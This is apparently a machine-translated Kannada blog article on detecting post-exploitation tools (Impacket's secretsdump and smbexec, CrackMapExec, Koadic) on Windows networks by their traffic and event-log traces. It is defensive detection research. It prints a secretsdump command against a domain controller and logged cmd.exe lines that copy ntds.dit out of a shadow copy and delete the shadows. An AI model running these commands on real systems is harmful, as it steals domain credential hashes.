ಪ್ರೊಹೋಸ್ಟರ್ > Блог > ಆಡಳಿತ > ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು

ಕಾರ್ಪೊರೇಟ್ ವಲಯದಲ್ಲಿನ ದಾಳಿಗಳ ಸಂಖ್ಯೆ ಪ್ರತಿ ವರ್ಷವೂ ಬೆಳೆಯುತ್ತಿದೆ: ಉದಾಹರಣೆಗೆ 2017 ರಲ್ಲಿ, 13% ಹೆಚ್ಚು ವಿಶಿಷ್ಟ ಘಟನೆಗಳು ದಾಖಲಾಗಿವೆ 2016 ಕ್ಕಿಂತ, ಮತ್ತು 2018 ರ ಕೊನೆಯಲ್ಲಿ - 27% ಹೆಚ್ಚು ಘಟನೆಗಳುಹಿಂದಿನ ಅವಧಿಗಿಂತ. ವಿಂಡೋಸ್ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ಮುಖ್ಯ ಕಾರ್ಯ ಸಾಧನವಾಗಿರುವಂತಹವುಗಳನ್ನು ಒಳಗೊಂಡಂತೆ. 2017-2018 ರಲ್ಲಿ, APT ಡ್ರಾಗನ್‌ಫ್ಲೈ, APT28, ಎಪಿಟಿ ಮಡ್ಡಿ ವಾಟರ್ ಯುರೋಪ್, ಉತ್ತರ ಅಮೆರಿಕಾ ಮತ್ತು ಸೌದಿ ಅರೇಬಿಯಾದಲ್ಲಿ ಸರ್ಕಾರ ಮತ್ತು ಮಿಲಿಟರಿ ಸಂಸ್ಥೆಗಳ ಮೇಲೆ ದಾಳಿ ನಡೆಸಿತು. ಮತ್ತು ಇದಕ್ಕಾಗಿ ನಾವು ಮೂರು ಸಾಧನಗಳನ್ನು ಬಳಸಿದ್ದೇವೆ - ಇಂಪ್ಯಾಕ್ಟ್, ಕ್ರ್ಯಾಕ್ಮ್ಯಾಪ್ಎಕ್ಸೆಕ್ и ಕೋಡಿಕ್. ಅವರ ಮೂಲ ಕೋಡ್ ತೆರೆದಿರುತ್ತದೆ ಮತ್ತು GitHub ನಲ್ಲಿ ಲಭ್ಯವಿದೆ.

ಈ ಉಪಕರಣಗಳನ್ನು ಆರಂಭಿಕ ನುಗ್ಗುವಿಕೆಗೆ ಬಳಸಲಾಗುವುದಿಲ್ಲ, ಆದರೆ ಮೂಲಸೌಕರ್ಯದೊಳಗೆ ಆಕ್ರಮಣವನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಲು ಇದು ಗಮನಿಸಬೇಕಾದ ಸಂಗತಿ. ಆಕ್ರಮಣಕಾರರು ಪರಿಧಿಯ ಒಳಹೊಕ್ಕು ನಂತರ ದಾಳಿಯ ವಿವಿಧ ಹಂತಗಳಲ್ಲಿ ಅವುಗಳನ್ನು ಬಳಸುತ್ತಾರೆ. ಇದು, ಮೂಲಕ, ಪತ್ತೆಹಚ್ಚಲು ಕಷ್ಟ ಮತ್ತು ಸಾಮಾನ್ಯವಾಗಿ ತಂತ್ರಜ್ಞಾನದ ಸಹಾಯದಿಂದ ಮಾತ್ರ ನೆಟ್‌ವರ್ಕ್ ಟ್ರಾಫಿಕ್‌ನಲ್ಲಿ ಹೊಂದಾಣಿಕೆಯ ಕುರುಹುಗಳನ್ನು ಗುರುತಿಸುವುದು ಅಥವಾ ಅನುಮತಿಸುವ ಉಪಕರಣಗಳು ಮೂಲಸೌಕರ್ಯವನ್ನು ಭೇದಿಸಿದ ನಂತರ ಆಕ್ರಮಣಕಾರನ ಸಕ್ರಿಯ ಕ್ರಿಯೆಗಳನ್ನು ಪತ್ತೆ ಮಾಡಿ. ಉಪಕರಣಗಳು ಫೈಲ್‌ಗಳನ್ನು ವರ್ಗಾಯಿಸುವುದರಿಂದ ಹಿಡಿದು ರಿಜಿಸ್ಟ್ರಿಯೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸುವವರೆಗೆ ಮತ್ತು ರಿಮೋಟ್ ಗಣಕದಲ್ಲಿ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವವರೆಗೆ ವಿವಿಧ ಕಾರ್ಯಗಳನ್ನು ಒದಗಿಸುತ್ತವೆ. ಅವರ ನೆಟ್‌ವರ್ಕ್ ಚಟುವಟಿಕೆಯನ್ನು ನಿರ್ಧರಿಸಲು ನಾವು ಈ ಪರಿಕರಗಳ ಅಧ್ಯಯನವನ್ನು ನಡೆಸಿದ್ದೇವೆ.

ನಾವು ಏನು ಮಾಡಬೇಕಾಗಿತ್ತು:

  • ಹ್ಯಾಕಿಂಗ್ ಉಪಕರಣಗಳು ಹೇಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತವೆ ಎಂಬುದನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಿ. ದಾಳಿಕೋರರು ಏನನ್ನು ಬಳಸಿಕೊಳ್ಳಬೇಕು ಮತ್ತು ಅವರು ಯಾವ ತಂತ್ರಜ್ಞಾನಗಳನ್ನು ಬಳಸಬಹುದು ಎಂಬುದನ್ನು ಕಂಡುಹಿಡಿಯಿರಿ.
  • ದಾಳಿಯ ಮೊದಲ ಹಂತಗಳಲ್ಲಿ ಮಾಹಿತಿ ಸುರಕ್ಷತಾ ಪರಿಕರಗಳಿಂದ ಏನನ್ನು ಪತ್ತೆಹಚ್ಚಲಾಗಿಲ್ಲ ಎಂಬುದನ್ನು ಕಂಡುಹಿಡಿಯಿರಿ. ದಾಳಿಕೋರರು ಆಂತರಿಕ ದಾಳಿಕೋರರಾಗಿರುವುದರಿಂದ ಅಥವಾ ಆಕ್ರಮಣಕಾರರು ಈ ಹಿಂದೆ ತಿಳಿದಿಲ್ಲದ ಮೂಲಸೌಕರ್ಯದಲ್ಲಿನ ರಂಧ್ರವನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತಿರುವ ಕಾರಣದಿಂದ ವಿಚಕ್ಷಣ ಹಂತವನ್ನು ಬಿಟ್ಟುಬಿಡಬಹುದು. ಅವನ ಕ್ರಿಯೆಗಳ ಸಂಪೂರ್ಣ ಸರಪಳಿಯನ್ನು ಪುನಃಸ್ಥಾಪಿಸಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ, ಆದ್ದರಿಂದ ಮತ್ತಷ್ಟು ಚಲನೆಯನ್ನು ಕಂಡುಹಿಡಿಯುವ ಬಯಕೆ.
  • ಒಳನುಗ್ಗುವಿಕೆ ಪತ್ತೆ ಸಾಧನಗಳಿಂದ ತಪ್ಪು ಧನಾತ್ಮಕತೆಯನ್ನು ನಿವಾರಿಸಿ. ವಿಚಕ್ಷಣದ ಆಧಾರದ ಮೇಲೆ ಕೆಲವು ಕ್ರಿಯೆಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಿದಾಗ, ಆಗಾಗ್ಗೆ ದೋಷಗಳು ಸಾಧ್ಯ ಎಂಬುದನ್ನು ನಾವು ಮರೆಯಬಾರದು. ಸಾಮಾನ್ಯವಾಗಿ ಮೂಲಸೌಕರ್ಯದಲ್ಲಿ ಯಾವುದೇ ಮಾಹಿತಿಯನ್ನು ಪಡೆಯಲು ಮೊದಲ ನೋಟದಲ್ಲಿ ಕಾನೂನುಬದ್ಧವಾದವುಗಳಿಂದ ಪ್ರತ್ಯೇಕಿಸಲಾಗದ ಸಾಕಷ್ಟು ಸಂಖ್ಯೆಯ ಮಾರ್ಗಗಳಿವೆ.

ಈ ಉಪಕರಣಗಳು ದಾಳಿಕೋರರಿಗೆ ಏನು ನೀಡುತ್ತವೆ? ಇದು ಇಂಪಾಕೆಟ್ ಆಗಿದ್ದರೆ, ದಾಳಿಕೋರರು ಮಾಡ್ಯೂಲ್‌ಗಳ ದೊಡ್ಡ ಲೈಬ್ರರಿಯನ್ನು ಸ್ವೀಕರಿಸುತ್ತಾರೆ, ಅದನ್ನು ಪರಿಧಿಯನ್ನು ಮುರಿದ ನಂತರ ಅನುಸರಿಸುವ ದಾಳಿಯ ವಿವಿಧ ಹಂತಗಳಲ್ಲಿ ಬಳಸಬಹುದಾಗಿದೆ. ಅನೇಕ ಉಪಕರಣಗಳು ಇಂಪ್ಯಾಕೆಟ್ ಮಾಡ್ಯೂಲ್ಗಳನ್ನು ಆಂತರಿಕವಾಗಿ ಬಳಸುತ್ತವೆ - ಉದಾಹರಣೆಗೆ, ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್. ಇದು ರಿಮೋಟ್ ಕಮಾಂಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್‌ಗಾಗಿ dcomexec ಮತ್ತು wmiexec ಅನ್ನು ಹೊಂದಿದೆ, ಇಂಪ್ಯಾಕೆಟ್‌ನಿಂದ ಸೇರಿಸಲಾದ ಮೆಮೊರಿಯಿಂದ ಖಾತೆಗಳನ್ನು ಪಡೆಯಲು ರಹಸ್ಯ ಡಂಪ್. ಪರಿಣಾಮವಾಗಿ, ಅಂತಹ ಗ್ರಂಥಾಲಯದ ಚಟುವಟಿಕೆಯ ಸರಿಯಾದ ಪತ್ತೆಯು ಉತ್ಪನ್ನಗಳ ಪತ್ತೆಯನ್ನು ಖಚಿತಪಡಿಸುತ್ತದೆ.

ಸೃಷ್ಟಿಕರ್ತರು CrackMapExec (ಅಥವಾ ಸರಳವಾಗಿ CME) ಕುರಿತು "ಇಂಪ್ಯಾಕ್ಟ್ನಿಂದ ನಡೆಸಲ್ಪಡುತ್ತಾರೆ" ಎಂದು ಬರೆದಿದ್ದಾರೆ ಎಂಬುದು ಕಾಕತಾಳೀಯವಲ್ಲ. ಹೆಚ್ಚುವರಿಯಾಗಿ, CME ಜನಪ್ರಿಯ ಸನ್ನಿವೇಶಗಳಿಗಾಗಿ ಸಿದ್ಧ-ಸಿದ್ಧ ಕಾರ್ಯವನ್ನು ಹೊಂದಿದೆ: ಪಾಸ್‌ವರ್ಡ್‌ಗಳು ಅಥವಾ ಅವುಗಳ ಹ್ಯಾಶ್‌ಗಳನ್ನು ಪಡೆಯಲು ಮಿಮಿಕಾಟ್ಜ್, ರಿಮೋಟ್ ಎಕ್ಸಿಕ್ಯೂಶನ್‌ಗಾಗಿ ಮೀಟರ್‌ಪ್ರೆಟರ್ ಅಥವಾ ಎಂಪೈರ್ ಏಜೆಂಟ್‌ನ ಅನುಷ್ಠಾನ, ಮತ್ತು ಬೋರ್ಡ್‌ನಲ್ಲಿ ಬ್ಲಡ್‌ಹೌಂಡ್.

ನಾವು ಆಯ್ಕೆ ಮಾಡಿದ ಮೂರನೇ ಸಾಧನವೆಂದರೆ ಕೊಡಿಕ್. ಇದು ತೀರಾ ಇತ್ತೀಚಿನದು, ಇದನ್ನು 25 ರಲ್ಲಿ ಅಂತರರಾಷ್ಟ್ರೀಯ ಹ್ಯಾಕರ್ ಕಾನ್ಫರೆನ್ಸ್ DEFCON 2017 ನಲ್ಲಿ ಪ್ರಸ್ತುತಪಡಿಸಲಾಯಿತು ಮತ್ತು ಪ್ರಮಾಣಿತವಲ್ಲದ ವಿಧಾನದಿಂದ ಗುರುತಿಸಲ್ಪಟ್ಟಿದೆ: ಇದು HTTP, ಜಾವಾ ಸ್ಕ್ರಿಪ್ಟ್ ಮತ್ತು ಮೈಕ್ರೋಸಾಫ್ಟ್ ವಿಷುಯಲ್ ಬೇಸಿಕ್ ಸ್ಕ್ರಿಪ್ಟ್ (VBS) ಮೂಲಕ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ಈ ವಿಧಾನವನ್ನು ಭೂಮಿಯಿಂದ ಬದುಕುವುದು ಎಂದು ಕರೆಯಲಾಗುತ್ತದೆ: ಉಪಕರಣವು ವಿಂಡೋಸ್‌ನಲ್ಲಿ ನಿರ್ಮಿಸಲಾದ ಅವಲಂಬನೆಗಳು ಮತ್ತು ಲೈಬ್ರರಿಗಳನ್ನು ಬಳಸುತ್ತದೆ. ರಚನೆಕಾರರು ಇದನ್ನು COM ಕಮಾಂಡ್ ಮತ್ತು ಕಂಟ್ರೋಲ್ ಅಥವಾ C3 ಎಂದು ಕರೆಯುತ್ತಾರೆ.

ಇಂಪ್ಯಾಕ್ಟ್

ಇಂಪ್ಯಾಕ್ಟ್‌ನ ಕಾರ್ಯಚಟುವಟಿಕೆಯು ಬಹಳ ವಿಸ್ತಾರವಾಗಿದೆ, AD ಒಳಗೆ ವಿಚಕ್ಷಣ ಮತ್ತು ಆಂತರಿಕ MS SQL ಸರ್ವರ್‌ಗಳಿಂದ ಡೇಟಾವನ್ನು ಸಂಗ್ರಹಿಸುವುದು, ರುಜುವಾತುಗಳನ್ನು ಪಡೆಯುವ ತಂತ್ರಗಳು: ಇದು SMB ರಿಲೇ ದಾಳಿಯಾಗಿದೆ ಮತ್ತು ಡೊಮೇನ್ ನಿಯಂತ್ರಕದಿಂದ ಬಳಕೆದಾರರ ಪಾಸ್‌ವರ್ಡ್‌ಗಳ ಹ್ಯಾಶ್‌ಗಳನ್ನು ಹೊಂದಿರುವ ntds.dit ಫೈಲ್ ಅನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತದೆ. ಇಂಪಕೆಟ್ ನಾಲ್ಕು ವಿಭಿನ್ನ ವಿಧಾನಗಳನ್ನು ಬಳಸಿಕೊಂಡು ದೂರದಿಂದಲೇ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ: WMI, ವಿಂಡೋಸ್ ಶೆಡ್ಯೂಲರ್ ಮ್ಯಾನೇಜ್‌ಮೆಂಟ್ ಸರ್ವಿಸ್, DCOM, ಮತ್ತು SMB, ಮತ್ತು ಹಾಗೆ ಮಾಡಲು ರುಜುವಾತುಗಳ ಅಗತ್ಯವಿದೆ.

ಸೀಕ್ರೆಟ್ಸ್ ಡಂಪ್

ಸೀಕ್ರೆಟ್ ಡಂಪ್ ಅನ್ನು ನೋಡೋಣ. ಇದು ಬಳಕೆದಾರರ ಯಂತ್ರಗಳು ಮತ್ತು ಡೊಮೇನ್ ನಿಯಂತ್ರಕಗಳನ್ನು ಗುರಿಯಾಗಿಸುವ ಮಾಡ್ಯೂಲ್ ಆಗಿದೆ. ಮೆಮೊರಿ ಪ್ರದೇಶಗಳಾದ LSA, SAM, SECURITY, NTDS.dit ನ ಪ್ರತಿಗಳನ್ನು ಪಡೆಯಲು ಇದನ್ನು ಬಳಸಬಹುದು, ಆದ್ದರಿಂದ ಇದನ್ನು ದಾಳಿಯ ವಿವಿಧ ಹಂತಗಳಲ್ಲಿ ಕಾಣಬಹುದು. ಮಾಡ್ಯೂಲ್‌ನ ಕಾರ್ಯಾಚರಣೆಯ ಮೊದಲ ಹಂತವು SMB ಮೂಲಕ ದೃಢೀಕರಣವಾಗಿದೆ, ಇದಕ್ಕೆ ಬಳಕೆದಾರರ ಪಾಸ್‌ವರ್ಡ್ ಅಥವಾ ಅದರ ಹ್ಯಾಶ್ ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಪಾಸ್ ದಿ ಹ್ಯಾಶ್ ದಾಳಿಯನ್ನು ಕೈಗೊಳ್ಳುವ ಅಗತ್ಯವಿದೆ. ಮುಂದೆ ಸೇವಾ ನಿಯಂತ್ರಣ ನಿರ್ವಾಹಕ (SCM) ಗೆ ಪ್ರವೇಶವನ್ನು ತೆರೆಯಲು ವಿನಂತಿ ಬರುತ್ತದೆ ಮತ್ತು winreg ಪ್ರೋಟೋಕಾಲ್ ಮೂಲಕ ನೋಂದಾವಣೆಗೆ ಪ್ರವೇಶವನ್ನು ಪಡೆದುಕೊಳ್ಳಿ, ಇದನ್ನು ಬಳಸಿಕೊಂಡು ಆಕ್ರಮಣಕಾರರು ಆಸಕ್ತಿಯ ಶಾಖೆಗಳ ಡೇಟಾವನ್ನು ಕಂಡುಹಿಡಿಯಬಹುದು ಮತ್ತು SMB ಮೂಲಕ ಫಲಿತಾಂಶಗಳನ್ನು ಪಡೆಯಬಹುದು.

ಅಂಜೂರದಲ್ಲಿ. 1 ವಿನ್ರೆಗ್ ಪ್ರೋಟೋಕಾಲ್ ಅನ್ನು ಬಳಸುವಾಗ, LSA ನೊಂದಿಗೆ ನೋಂದಾವಣೆ ಕೀಲಿಯನ್ನು ಬಳಸಿಕೊಂಡು ಪ್ರವೇಶವನ್ನು ಹೇಗೆ ಪಡೆಯಲಾಗುತ್ತದೆ ಎಂಬುದನ್ನು ನಾವು ನೋಡುತ್ತೇವೆ. ಇದನ್ನು ಮಾಡಲು, opcode 15 - OpenKey ನೊಂದಿಗೆ DCERPC ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 1. Winreg ಪ್ರೋಟೋಕಾಲ್ ಅನ್ನು ಬಳಸಿಕೊಂಡು ನೋಂದಾವಣೆ ಕೀಲಿಯನ್ನು ತೆರೆಯುವುದು

ಮುಂದೆ, ಕೀಗೆ ಪ್ರವೇಶವನ್ನು ಪಡೆದಾಗ, opcode 20 ನೊಂದಿಗೆ SaveKey ಆಜ್ಞೆಯೊಂದಿಗೆ ಮೌಲ್ಯಗಳನ್ನು ಉಳಿಸಲಾಗುತ್ತದೆ. ಇಂಪ್ಯಾಕೆಟ್ ಇದನ್ನು ನಿರ್ದಿಷ್ಟ ರೀತಿಯಲ್ಲಿ ಮಾಡುತ್ತದೆ. ಇದು .tmp ನೊಂದಿಗೆ ಲಗತ್ತಿಸಲಾದ 8 ಯಾದೃಚ್ಛಿಕ ಅಕ್ಷರಗಳ ಸ್ಟ್ರಿಂಗ್ ಆಗಿರುವ ಫೈಲ್‌ಗೆ ಮೌಲ್ಯಗಳನ್ನು ಉಳಿಸುತ್ತದೆ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಈ ಫೈಲ್‌ನ ಮತ್ತಷ್ಟು ಅಪ್‌ಲೋಡ್ System32 ಡೈರೆಕ್ಟರಿಯಿಂದ SMB ಮೂಲಕ ಸಂಭವಿಸುತ್ತದೆ (Fig. 2).

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 2. ರಿಮೋಟ್ ಯಂತ್ರದಿಂದ ನೋಂದಾವಣೆ ಕೀಲಿಯನ್ನು ಪಡೆಯುವ ಯೋಜನೆ

ವಿನ್ರೆಗ್ ಪ್ರೋಟೋಕಾಲ್, ನಿರ್ದಿಷ್ಟ ಹೆಸರುಗಳು, ಆಜ್ಞೆಗಳು ಮತ್ತು ಅವುಗಳ ಆದೇಶವನ್ನು ಬಳಸಿಕೊಂಡು ಕೆಲವು ರಿಜಿಸ್ಟ್ರಿ ಶಾಖೆಗಳಿಗೆ ಪ್ರಶ್ನೆಗಳ ಮೂಲಕ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಅಂತಹ ಚಟುವಟಿಕೆಯನ್ನು ಕಂಡುಹಿಡಿಯಬಹುದು ಎಂದು ಅದು ತಿರುಗುತ್ತದೆ.

ಈ ಮಾಡ್ಯೂಲ್ ವಿಂಡೋಸ್ ಈವೆಂಟ್ ಲಾಗ್‌ನಲ್ಲಿ ಕುರುಹುಗಳನ್ನು ಸಹ ಬಿಡುತ್ತದೆ, ಇದು ಪತ್ತೆಹಚ್ಚಲು ಸುಲಭವಾಗುತ್ತದೆ. ಉದಾಹರಣೆಗೆ, ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಪರಿಣಾಮವಾಗಿ

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

ವಿಂಡೋಸ್ ಸರ್ವರ್ 2016 ಲಾಗ್‌ನಲ್ಲಿ ನಾವು ಈವೆಂಟ್‌ಗಳ ಕೆಳಗಿನ ಪ್ರಮುಖ ಅನುಕ್ರಮವನ್ನು ನೋಡುತ್ತೇವೆ:

1. 4624 - ರಿಮೋಟ್ ಲಾಗಿನ್.
2. 5145 - winreg ರಿಮೋಟ್ ಸೇವೆಗೆ ಪ್ರವೇಶ ಹಕ್ಕುಗಳನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತಿದೆ.
3. 5145 - System32 ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ ಫೈಲ್ ಪ್ರವೇಶ ಹಕ್ಕುಗಳನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತಿದೆ. ಫೈಲ್ ಮೇಲೆ ತಿಳಿಸಲಾದ ಯಾದೃಚ್ಛಿಕ ಹೆಸರನ್ನು ಹೊಂದಿದೆ.
4. 4688 - vssadmin ಅನ್ನು ಪ್ರಾರಂಭಿಸುವ cmd.exe ಪ್ರಕ್ರಿಯೆಯನ್ನು ರಚಿಸುವುದು:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ಆಜ್ಞೆಯೊಂದಿಗೆ ಪ್ರಕ್ರಿಯೆಯನ್ನು ರಚಿಸುವುದು:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ಆಜ್ಞೆಯೊಂದಿಗೆ ಪ್ರಕ್ರಿಯೆಯನ್ನು ರಚಿಸುವುದು:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ಆಜ್ಞೆಯೊಂದಿಗೆ ಪ್ರಕ್ರಿಯೆಯನ್ನು ರಚಿಸುವುದು:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

ಅನೇಕ ನಂತರದ ಶೋಷಣೆಯ ಸಾಧನಗಳಂತೆ, ಇಂಪ್ಯಾಕ್ಟ್ ಆಜ್ಞೆಗಳನ್ನು ದೂರದಿಂದಲೇ ಕಾರ್ಯಗತಗೊಳಿಸಲು ಮಾಡ್ಯೂಲ್‌ಗಳನ್ನು ಹೊಂದಿದೆ. ರಿಮೋಟ್ ಗಣಕದಲ್ಲಿ ಸಂವಾದಾತ್ಮಕ ಕಮಾಂಡ್ ಶೆಲ್ ಅನ್ನು ಒದಗಿಸುವ smbexec ಮೇಲೆ ನಾವು ಗಮನಹರಿಸುತ್ತೇವೆ. ಈ ಮಾಡ್ಯೂಲ್‌ಗೆ ಪಾಸ್‌ವರ್ಡ್ ಅಥವಾ ಪಾಸ್‌ವರ್ಡ್ ಹ್ಯಾಶ್‌ನೊಂದಿಗೆ SMB ಮೂಲಕ ದೃಢೀಕರಣದ ಅಗತ್ಯವಿದೆ. ಅಂಜೂರದಲ್ಲಿ. ಚಿತ್ರ 3 ರಲ್ಲಿ ಅಂತಹ ಉಪಕರಣವು ಹೇಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ ಎಂಬುದರ ಉದಾಹರಣೆಯನ್ನು ನಾವು ನೋಡುತ್ತೇವೆ, ಈ ಸಂದರ್ಭದಲ್ಲಿ ಇದು ಸ್ಥಳೀಯ ನಿರ್ವಾಹಕರ ಕನ್ಸೋಲ್ ಆಗಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 3. ಇಂಟರಾಕ್ಟಿವ್ smbexec ಕನ್ಸೋಲ್

ದೃಢೀಕರಣದ ನಂತರ smbexec ನ ಮೊದಲ ಹಂತವೆಂದರೆ SCM ಅನ್ನು OpenSCManagerW ಆಜ್ಞೆಯೊಂದಿಗೆ ತೆರೆಯುವುದು (15). ಪ್ರಶ್ನೆಯು ಗಮನಾರ್ಹವಾಗಿದೆ: MachineName ಕ್ಷೇತ್ರವು DUMMY ಆಗಿದೆ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 4. ಸೇವಾ ನಿಯಂತ್ರಣ ನಿರ್ವಾಹಕವನ್ನು ತೆರೆಯಲು ವಿನಂತಿ

ಮುಂದೆ, CreateServiceW ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸೇವೆಯನ್ನು ರಚಿಸಲಾಗಿದೆ (12). smbexec ನ ಸಂದರ್ಭದಲ್ಲಿ, ನಾವು ಪ್ರತಿ ಬಾರಿಯೂ ಅದೇ ಆಜ್ಞೆಯ ನಿರ್ಮಾಣ ತರ್ಕವನ್ನು ನೋಡಬಹುದು. ಅಂಜೂರದಲ್ಲಿ. 5 ಹಸಿರು ಬಣ್ಣವು ಬದಲಾಯಿಸಲಾಗದ ಕಮಾಂಡ್ ನಿಯತಾಂಕಗಳನ್ನು ಸೂಚಿಸುತ್ತದೆ, ಹಳದಿ ಆಕ್ರಮಣಕಾರರು ಏನನ್ನು ಬದಲಾಯಿಸಬಹುದು ಎಂಬುದನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದ ಫೈಲ್‌ನ ಹೆಸರು, ಅದರ ಡೈರೆಕ್ಟರಿ ಮತ್ತು ಔಟ್‌ಪುಟ್ ಫೈಲ್ ಅನ್ನು ಬದಲಾಯಿಸಬಹುದು ಎಂದು ನೋಡುವುದು ಸುಲಭ, ಆದರೆ ಉಳಿದವು ಇಂಪ್ಯಾಕೆಟ್ ಮಾಡ್ಯೂಲ್‌ನ ತರ್ಕಕ್ಕೆ ತೊಂದರೆಯಾಗದಂತೆ ಬದಲಾಯಿಸುವುದು ಹೆಚ್ಚು ಕಷ್ಟ.

ವಿಂಡೋಸ್ ಮೂಲಸೌಕರ್ಯದ ಮೇಲಿನ ದಾಳಿಯನ್ನು ಹೇಗೆ ಕಂಡುಹಿಡಿಯುವುದು: ಹ್ಯಾಕರ್ ಪರಿಕರಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವುದು
ಅಕ್ಕಿ. 5. ಸೇವಾ ನಿಯಂತ್ರಣ ನಿರ್ವಾಹಕವನ್ನು ಬಳಸಿಕೊಂಡು ಸೇವೆಯನ್ನು ರಚಿಸಲು ವಿನಂತಿ

Smbexec ವಿಂಡೋಸ್ ಈವೆಂಟ್ ಲಾಗ್‌ನಲ್ಲಿ ಸ್ಪಷ್ಟವಾದ ಕುರುಹುಗಳನ್ನು ಸಹ ಬಿಡುತ್ತದೆ. ipconfig ಆಜ್ಞೆಯೊಂದಿಗೆ ಸಂವಾದಾತ್ಮಕ ಕಮಾಂಡ್ ಶೆಲ್‌ಗಾಗಿ ವಿಂಡೋಸ್ ಸರ್ವರ್ 2016 ಲಾಗ್‌ನಲ್ಲಿ, ನಾವು ಈವೆಂಟ್‌ಗಳ ಕೆಳಗಿನ ಪ್ರಮುಖ ಅನುಕ್ರಮವನ್ನು ನೋಡುತ್ತೇವೆ:

1. 4697 - ಬಲಿಪಶುವಿನ ಯಂತ್ರದಲ್ಲಿ ಸೇವೆಯ ಸ್ಥಾಪನೆ:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

